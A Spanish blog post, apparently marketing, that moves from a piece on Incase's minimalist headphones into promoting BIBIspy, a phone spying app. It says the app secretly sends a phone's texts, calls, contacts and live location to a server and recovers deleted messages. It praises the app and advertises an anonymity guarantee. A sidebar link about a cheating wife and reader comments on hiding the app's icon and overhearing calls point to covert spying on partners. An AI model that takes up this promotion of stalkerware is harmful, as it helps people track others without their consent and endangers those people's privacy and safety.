El minimalismo en los productos de alta tecnología

Audífonos Incase

Incase es una marca especializada en tecnología. Uno de sus productos se trata de unos audífonos minimalistas, y con esto me refiero a « extremadamente simples».

Son blancos, equipados con auriculares grises. No hay adornos en estos audífonos: un simple cable conecta los dos colchoncitos, y un cable sencillo llega al enchufe. Incase ha adoptado la frase:

  • « Sonido natural. Mínimo diseño »

Si hablo de estos audífonos el día de hoy es porque creo que Incase ha tocado un aspecto importante en el diseño que se acomoda al hardware pero también al programa espia como BIBIspy para espionaje y respaldo del contenido de un celular.

El minimalismo en la informática

La informática ha sido un campo vanguardista en la llegada del minimalismo. Originalmente, esta palabra se utilizaba para designar una corriente de la música techno muy básica y sin arreglos. Luego se utilizó para describir el hardware de estética simple y características avanzadas.

El propósito del minimalismo está aquí: para un fabricante, puede involucrar muchos gastos el enfocarse en la apariencia del producto en lugar de en su contenido.

Segunda ventaja: al minimalismo se le conoce por contener más « clase » y más lujo que los objetos con diseño extravagante que se utiliza para esconder una funcionalidad muy pobre.

El minimalismo en el software espía BIBIspy

También podemos hablar de minimalismo en BIBIspy : la aplicación para celulares que se utiliza para espiar un teléfono; pero además para guardar contenidos enteros en intervalos regulares.

Con BIBIspy, el minimalismo es revelado con una ausencia de « empaque » que normalmente solo sirve para incrementar el precio del producto. BIBIspy está disponible a la venta únicamente por internet por medio de una descarga. No hay forma de comprarlo en una caja. La ventaja de esto es que está disponible para ti inmediatamente y que sus costos de producción son muy reducidos.

Además, el minimalismo de BIBIspy es notorio en sus características: este software o aplicación se especializa en espiar smartphones y proteger su contenido, y nada más: no te da el clima, no hay publicidad, ninguna otra función.

Para espiar un celular :

lo hace simplemente transmitiendo a un servidor en internet toda la información del teléfono: mensajes de texto y llamadas junto con los sobrenombres de las personas, y ubicación en tiempo real del dispositivo.

Para respaldar la información del smartphone :

lo hace creando una copia del directorio y de los mensajes intercambiados, aun cuando hayan sido borrados por el usuario.

El minimalismo: ¿garantiza la seriedad?

Sí, personalmente creo que el minimalismo es una garantía de seriedad, y es por eso que mencioné anteriormente el caso de la marca Incase. Me gustan los productos minimalistas porque las compañías detrás de estos productos no gastan montones en la apariencia y forma del producto: se enfocan en lo esencial, el objetivo que el cliente busca.

En este sentido, BIBIspy es un excelente software que desempeña perfectamente la función para la que fue creado.

Tre Fleccia

Aquí el mejor control de la aplicación

Tres garantías para el software:

Reembolso 10 días

la garantía del anonimato

libre de apoyo

=> Vigilancia, Monitoreo y Recepción de llamada

{ 1 comentario… add one }

    Deja un comentario

    Time limit is exhausted. Please reload CAPTCHA.

    Next Post:

    Previous Post:

    El Software Espía

    localizador1

      Últimos comentarios

      • Johana acebey { Hay que vez - Esta bien } – Dic 31, 2:21 AM
      • Cain Ortega { Hola, creo que el teléfono es un iPhone y el ícono es el de Cydia. Para quitarlo, escribe... } – Dic 11, 6:18 AM
      • Cain Ortega { Ce comment a été raccourci à zéro. } – Dic 11, 6:14 AM
      • Cain Ortega { Hola, respecto al número IMEI, si no lo pide es normal, no hay necesidad. En cuanto a tu... } – Dic 11, 6:08 AM
      • Justa { Funciona muy bien pero tengo un ícono que apareció en el teléfono cómo lo quito } – Dic 05, 6:33 AM
      • Winston { Hola, el programa permite escuchar las llamadas? } – Dic 03, 10:04 PM

      Mi mujer me engaña: ¿qué hago?

      monitorizacion1
        Share This